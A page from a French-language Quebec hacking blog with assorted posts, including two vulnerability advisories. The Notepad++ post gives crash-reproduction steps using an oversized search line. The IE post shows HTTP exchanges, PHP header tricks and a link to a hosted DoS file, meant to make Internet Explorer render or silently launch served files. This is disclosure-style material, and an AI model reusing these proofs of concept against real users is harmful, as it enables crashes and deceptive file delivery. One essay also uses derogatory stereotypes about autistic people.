PLANETE UNDERGROUND (BETA)

Qu'est-ce que Mindkind? 

Tenu compte que j'ai une barbe et les cheveux long, je suis dans mon plein droit de faire de la philo. Alors nous voila..

Qu'est-ce que Mindkind?
Souvent le monde dans la rue me reconnaisse et me demande : "Mais Last, qu'est-ce Mindkind?". Je leur réponds ce que Wyze me dit depuis des années : "C'est ce que tu veux que ça soit". Alors ils me regardent les yeux ronds et poursuivre leur chemin.

Bon, la surprise, je give up dès le début de l'article de vous expliquer ce qu'est Mindkind. Je suis persuader que si j'explique n'importe quoi, dans mes mots, avec mes expériences, vous n'allez rien croire, rien voir donc rien comprendre de ce que je veux dire.

En faite, fuck mon explication et concentrez-vous sur mon premier paragraphe de blah blah, plus particulièrement sur :
"Souvent le monde dans la rue me reconnaisse et me demande"
C'est ma phrase. Who cares.
Ce qui important now, c'est de vous rappelez ce que vous avez ressenti quand vous avez lu cette phrase. Le secret est la.

Moi quand je lis ça, je ris. Car je sais qu'en réalité, PERSONNE me croise dans la rue pour me demander une pareil question. C'est une joke. Je trouve que c'est drôle parce que justement c'est pas vrai, et ça serait encore plus marrant si ça arriverait pour vrai. C'est le genre de farce qu'on utilise dans les "égo-joke". C'est le fun des "égo-joke" car l'individualisme et l'égocentrisme sont "in" durant les dernières années. Je ne fais que suivre une tendance démocratique...

Concentrer vous maintenant sur votre réaction au moment de la lecture de la phase. Si vous avez souris, vous avez compris ce qu'est Mindkind, sinon, ben laisser faire.

Si vous avez trouvé qu'on se croit, qu'on se vente, qu'on s'invente. Et bien vous avez raison. En faite c'est la croyance populaire sur Mindkind quand on en parle à date. CEPENDANT, si on pourrait séparer les réactions suite à cette impression on aurait 2 catégories :
0 : Un certain dégout car on aime pas les gens avec un gros égo.
1 : Un certain sourire, car on aime ce genre de blague.

J'espère pour vous que vous êtes du type 1, sinon faite moi plaisir, changer ou parter pour toujours.


Sur ce je vais quand même vous répondre.. mais d'une manière que vous allez (je l'espère) comprendre (skillz en orientée objet requises genre ce concept la). Mindkind c'est une classe abstraite, un peu comme une interface, où chacun dérive sa propre vision et s'en fait une instance. Perso je crois que la raison pour laquelle une personne ne peut comprendre ce que c'est pour moi, c'est que leur vision de la classe de base est pas la même que la mienne, et malheureusement ça peut arriver que c'est pas compatible pentoute. Dans ce cas la, n'essayer pas de vous mettre dans le même package que moi et compiler pour tirer une conclusion, car je vous garanti que ça va chier raide.. tout simplement parce qu'on utilise pas la même base class même si elle possède le même nom.

i'm off again.

-- LastCall_ avec trop d'heures de Java dans le corps dernièrement




[ 5 comments ] ( 663 views ) permalink ( 2.9 / 577 )
Entropie #1 Call for Paper 

Un nouveau ezine tente de prendre son envol, Le call for paper explique pas mal tout sque jaurais a dire sur leur ezine alors je vous invites a le lire.
entropie 01 CFP


ps : je vous rappelle que nous aussi on prend les articles la ! ;)
[ 10 comments ] ( 1540 views ) permalink ( 3 / 623 )
maintenance 

Le site sera (peut-être) DOWN pour maintenance en fds.

reason: upgrade de OS et remove de rootkits & migration d'une partie sur un autre serveur.

Bare with us.. heh

[ 8 comments ] ( 637 views ) permalink ( 3 / 581 )
Notepad++ Multiples vulns 

###############################################################################
# Notepad++ multiples vulnerabilities:
# Vendor: http://notepad-plus.sourceforge.net
# Impact : kind of critical
# Vendors status: patching ...
# Bugs: multiples heap overflow,N.D.P (Null Dereference Pointer)
#
# Comment:
# Déjà je dois avouer que j'adore notepad++ c'est l'éditeur parfaitement conçu pour un
# auditeur.
# Hélas on as quelques bugs facilement détectable dessus :
#
# 1) Long filename Dénial of Service(Null Dereference pointer): 200 chars filename suffisent pour faire planter le soft
# 2) Search heap overflow ( pas cool pantoute :/ )
# 3) big file heap overflow
#
# le 1) et le 3) sont des classiques dans ce genre d'audit, le long filename nous DoS notepad++ , et le big file (~250 mo)
# nous heap overflow notepad++.
# Mais le 2) est relativement funny héhé :)
# On sais que un auditeur qui va auditer un software quelqu'onque va commencer par le search sur
# des fonctions basic que l'ont sais relativement vulnerables si elles sont mal utilisées...
# comme : strcpy,strcat,fgets,sprintf,vprintf,vfprintf,vsprintf,vsnprintf,etc,etc
# en PHP pareil : eval(),system(),include(),etc etc
# donc , il fait un search (comme je le ferais moi meme) dans un directory pour checker
# comment est constitué le cms/software, voir comment il utilise ces fonctions,etc ...
# donc par exemple,disons que la premiere chose que Mr-X check c'est un snprintf,
# si il utilise l'option usefull de notepad++ le search dans le repertoire
#( les puristes me parlerons de grep ,m'en branle solidement dans ce cas-ci.)
# il se fera powned a partir du moment que la ligne dans laquelle le string qu'il cherche
# fais plus que 4098 chars...héhé ...
# mais comment reproduire ca ? create un fichier nommée blabla.txt avec powned AAAAAA x 5000 dedans, et un autre blibli.txt .
# dans blibli.txt mettez whatever, ouvre blibli.txt et faites un search pour le string "powned"
# boom :]

[ 7 comments ] ( 1053 views ) permalink ( 3.2 / 669 )
retour de newffr 

le forum de http://www.newffr.com est de nouveau ouvert avec un vieu backup datant de 2007. Tout le monde en a deja un peu parler, fak on fait juste faire suivre la news pour ceux qui sorte du bois.

presser vous pas vous allez rien manquer personne a encore poster dequoi.


pour ceux qui voudrais parler sur IRC au staff du forum (on se demanderais bien pourquoi quelqu'un voudrais fair ca).

#newffr
reseau : silc.dg-sc.org (un trou perdu)
[ 28 comments ] ( 2158 views ) permalink ( 3 / 532 )
psychologie et hacking 

pre-reading here


Une des choses qu'on remarque depuis l'aire de l'industrialisation est que l'être humain devient débile à faire de faire toujours la même chose. Visser des boulons à la GM rend neo-zombie et c'est normal.

Mais qu'en est-il de la sécurité informatique?

On remarque en analysant le domaine, qu'effectivement il porte bien son nom, il s'agit de sécurité ET d'informatique. 2 choses complètement différentes qui forment un tout que l'ont connait bien.

Malheureusement, les défauts psychologiques de bases provenant des déformations professionnelles de chaque domaine se rapporte aussi au produit final.

En informatique, on sait tous qu'on est des asperges. À force de travailler et de parler avec des machines, on oublie plusieurs éléments essentiels de l'être humain et on devient du genre autistique. Le concept d'asperger vaut la peine d'être compris, donc read on:
http://en.wikipedia.org/wiki/Asperger_syndrome
qui se résume à "difficulties in social interaction and by restricted, stereotyped patterns of behavior, interests and activities"

Autrement dit on s'enferme dans nos mondes et on a de la misère à se faire comprendre par les autres. Vous vous en rendez pas compte parce que vous êtes un lémurien, mais mettez n'importe quel neo-zombie dans un party de lémurien et vous obtenez quelqu'un qui s'emmerde.

Donc, une fois asperge on à tendance à devenir "anti-social". Ce qui amène à détester la société, à détester ce qui établie, car anyways la masse nous comprends pas, alors pourquoi jouer leur game?

Ça ne veut pas dire que tout les informaticiens sont des asperges, mais tout ceux qui en abuse se font attirer par le coté obscure de la force un jour ou l'autre et finissent par coder tout seul le soir à la maison en buvant une bière.

Enough said about the lémurien générique. Maintenant regardont le concept de sécurité.

La sécurité sans être mélangée avec l'informatique revient à protéger quelque chose, généralement de quelqu'un ou d'une catastrophe.

On serait tanter de dire que le meilleur exemple c'est la police. Mais ce n'est pas le cas. La police s'ils abusent, finissent par se faire réprimander royalement ou encore tirer une balle dans le front. Les gardes de sécurités sont un meilleur exemple. Eux y'on plus de l'attitude, et généralement il abuse car il n'ont pas vraiment de vrai pouvoir.

Donc en prends cette mentalité la de sécurité, et on scrute un peu. La personne doit en tout temps se méfier. C'est sa job. Quelqu'un entre dans le bulding, est-ce un bandit? Il est 11h pm et il semble venir starter son chiffre.. est-ce un bandit ou une asperge qui commence sa journée de travail? Toujours le questionnement, toujours la méfiance. C'est sa job.

Répéter ça 8h par jour, 5 jours par semaines avec des chiffres de 12 heures, et vous avez maintenant l'attitude d'un garde de sécurité qui se croit.

Encore la, c'est pas tout les gardes qui sont de ce genre la. Y'en a qui sont cool, qui comprennent qu'il sont en faite juste un concierge qui doit rester prudent mais gentil en même temps. Qu'ils sont payer cher pour lire le journal et écouter la TV, paske c eux autres qui se font buter en premier si ya un raid.

Donc bref, la sécurité instaure une méfiance. Curieusement, et c'est la que le mélange est explosif, un certaine confiance en soit doit s'installer profondément dans une personne qui fait la sécurité. Elle est convaincu d'être le good guy hein? C'est alors que l'over confiance entre en jeu. Si un garde n'a pas confiance en lui, alors comment il va spotter le truant, comment il va pouvoir se défendre en cas d'attaque. Il faut aussi laisser une image de confiance pour que les gens nous fassent confiance.

Dans le monde réel, certains suivent des cours de karaté d'auto défense et etc, mais au niveau psychologique, tout ce que ça fait, c'est la même chose que dans un monde virtuel : on se bâtie une confiance en soit. Malheureusement ben du monde savent pas pentoute comment faire, et se bâtissent un égo-confiance en soit. C'est le piège que tout le monde fait, et que la majorité de la populace qui ont supposément confiance en eux font. Bâtir sa confiance sur son égo, c'est bâtir une confiance d'une image de soi-même... ça peut marcher quand on est le bonhomme qui reste au fond du couloir à lire le journal, mais dès que quelqu'un rentre dans la bulle, oh lala l'égo se défends car il fait face au jugement d'un autre.

Bon,
nous voila donc maintenant prêt à faire le lien.
Quelqu'un en informatique. Quelqu'un en sécurité.
Un asperge. Un parano.
La même personne.

Voila où on est donc rendu. En plus les défauts se mélange bien, quoi de plus convivial qu'un anti-social pour être parano. Perfect match. Aussi, quoi de plus convivial qu'un gros égo sur de lui, et une personne qui ne fait que se focusser que sur SON domaine (un connaisseur).

Le mélange donne du monde qui sont en sécurité, qui sont très bon voir même excellent dans le travail, qui ont une forte passion pour la chose, mais qui en même temps sont des totals assholes avec qui sont généralement pas agréable à cotoyer.

Peut-être ce n'est pas applicable car tout pousser? C'est vrai, y'a pas que des épais.. mais à un moment donné ou un autre, à force de faire de la sécurité informatique abusivement, on fini par développer le pattern et à embracer ce coté la.

re-lire encore l'article :
http://lists.immunitysec.com/pipermail/ ... 05108.html
On y voit donc apparamment 2 pôles.. le hacker blackhat qui dit que c'est une passion et les whitehats qui se font chier dessus. L'auteur est visiblement dans un groupe et contre l'autre, du moins, si ce n'est
pas du black vs white il trace une ligne entre lui et les autres. Yé bad, yé désolé, yé écoeuré, y trouve que le hacking ça suxx et surtout qu'il est différent!

.. WRONG!

Si on tient en considération tout l'article que vous lisez présentement, on voit que finalement, l'auteur est juste quelqu'un en sécurité informatique (ya beau pas travailler dans le domaine, si son brain est mostly occupé à faire ça dans sa vie on peut dire qu'il fait partie du dit domaine autant que quelqu'un qui work la dessus de 9 à 5) qui dumpshit sur d'autres en sécurité informatique.

En bref, une asperge parano qui chiale contre d'autres asperges paranos.

La on est rendu à la fin du post.. et on a un goût morose dans bouche unpeu comme quand on lit le post de LMH sur info-pull.com...

Eh bien, garder le sourire, car l'informatique et surtout la sécurité informatique est à l'age de pierre encore. On ne voit que les débuts.. tranquillement pas vite le domaine va s'ouvrir sur le monde, et ça va finir par soit A) avoir de l'allure ou B) ne plus exister.


LastCall_'s out.

++


[ 14 comments ] ( 3171 views ) permalink ( 3.1 / 634 )
IE ALL (windows) Download/File Security Bypass  

#################################################################################################
# Product : IE ALL (windows)
# Bug : Download/File Security Bypass
# From : Remote
#
# If you create an empty file called test.exe in your /www/ folder when you get it via IE , FF , Opera , etc, you'll
# get prompted for download/execute the file, right.
#
# But if we put inside our .exe , some html like a simple :
# <html>
# <head><title>bou!</title></head>
# <body>
# <script>window.print()</script>
# </body>
# </html>
#
# What happens ?
# Firefox ,Opera still ask for download the .exe, but IE * execute this html =)
#
# Another exemple :
# If we put instead of the html code , some header like the pdf one :
# %PDF-1.4
#
# What happens ?
# IE says "Internet Explorer can not display this Web page"
#
# But in reality , our file got downloaded & adobe was launched "silently" (just have a look in TaskManager)
# To prove my point you can try this file with IE * (acrobat reader * should crash) : http://209.190.122.178/HI2.exe
# This file is a DoS that i've discoverered in acrobat reader renamed with an exe extension, the advisory is located here : http://milw0rm.com/exploits/5687
#
# So what's going on ?
#
# Let's try the pdf thing:

GET /HI2.exe HTTP/1.0
Host: Whatever.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob) // Internet Explorer use Mozilla/***(compatible; MSIE, for understanding what is made for Netscape...
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:
HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:29:25 GMT
Server: Apache
Last-Modified: Thu, 19 Jun 2008 20:46:16 GMT
ETag: "a010c-2db3b-4500b118a9600"
Accept-Ranges: bytes
Content-Length: 187195
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Now let's see the print one:

GET /print.exe HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:

HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:32:10 GMT
Server: Apache
Last-Modified: Wed, 18 Jun 2008 17:51:19 GMT
ETag: "a010a-63-44ff48207b3c0"
Accept-Ranges: bytes
Content-Length: 99
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Let's do a test :
<?php
header('Content-type: application/x-msdownload');
header('Content-Disposition: attachment; filename="print.exe"');
readfile('print.exe');
?>
# Working as it should, you will get prompted for a download on all browsers
<?php
header('Content-type: application/x-msdownload');
readfile('HI2.exe');
?>
# Firefox & Netscape ask for download file.php, Opera ask for download file.exe, and IE show the content of file.exe.
# So if no Content-Disposition: is supplied with the Content-Type:application/x-msdownload ,IE try to read the file,
# unless to check the extension, and prompt ANYWAYS for download/execute.
#
# But wait a minute, there's a funny bug here ( http://milw0rm.com/exploits/641 ):
# http://site.com/123456.exe?12345.log //notepad is launched with the content of the 123456.exe (you need a real executable btw .)
# This still unpatched on IE * , i guess this advisory explain the whole fuck
# So what can we do with this ? we can easly pown urlmon.dll, but this is another advisory that will be related to this one :]
#
#
# So let's think ,Microsoft suggest that safari users, should remove them browser, because of the unsecure file download policy.
# ( http://www.microsoft.com/technet/securi ... 53818.mspx , http://cve.mitre.org/cgi-bin/cvename.cg ... -2007-4424 )
#
# Then i guess i should suggest to IE's users to use Firefox as a default browser, untill Microsoft stops them strategic marketing propaganda
# and then review their software specially designed to get powned since 1995 a.k.a IE 1.0
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"

Reference on IE6:
http://support.microsoft.com/kb/329661/en-us/

[ 66 comments ] ( 17045 views ) permalink ( 2.9 / 574 )
quebec hacking force banned 

Il semblerait que le hosting pour "quebec hacking force" (nos joyeux script kiddies hax0rs du style rectumcrew next gen) ait dropper leur forum :

Warning Onlineguardian a banni " quebechackingforce.forum-actif.net " hébergé sur le service forumactif.com pour cause de non respect des conditions générales d’utilisation.
Les raisons possibles de suppression sont les suivantes :

* Contenu violent ou repoussant
* Contenu violent ou incitant à la haine
* Contenu diffamant et/ou atteinte à l’intégrité d’une personne
* Contenu à caractère sexuel et/ou pornographique
* Actes dangereux et pernicieux
* Violation des droits d’auteurs
* Spam
* Pages de phishing et/ou malware
* Fraude à la carte bancaire
* Piratage / hacking


Source : http://www.onlineguardian.net/results.p ... -actif.net
[ 4 comments ] ( 751 views ) permalink ( 3 / 523 )
BotCast 29 

Deceptimus & Botrax nous font le premier segment en Anglais avec une perspective de l'Oklahoma! Les drogues dans l'eau potable poussent les amaricains à faire des appels sur la radio pour tuer les activistes anti-guerre, mais les vols de banques augmentent à la place.

http://www.botcast.net/shows/2008/BotCa ... rround.mp3

[ 40 comments ] ( 2134 views ) permalink related link ( 3 / 547 )
Rafale 9 

Content: Rafale #9 out : http://www.rafale.org/

au somaire

-------------------------------------------------------------------------
9.00 - Sommaire & Introduction & Disclaimer ---- Rafale
9.01 - In Your Street, Volume 1 ---- taskforce
9.02 - Soirée avec AlloPass ---- taskforce
9.03 - Protalk Plus - Alarm Reporting Unit ---- taskforce
9.04 - Mot de la fin ---- Rafale


Il sagit en gros d'un hommage postume a taskforce. Si un des membres de Rafale lit se blog (Comme si le contaire pouvait etre possible ;) ). On aimerait bien savoir si y va avoir d'autre ezine (donc laissez nous un message ;) ).

[ 6 comments ] ( 747 views ) permalink ( 2.9 / 542 )

<<First <Back | 1 | 2 | 3 | 4 | 5 | 6 | 7 | Next> Last>>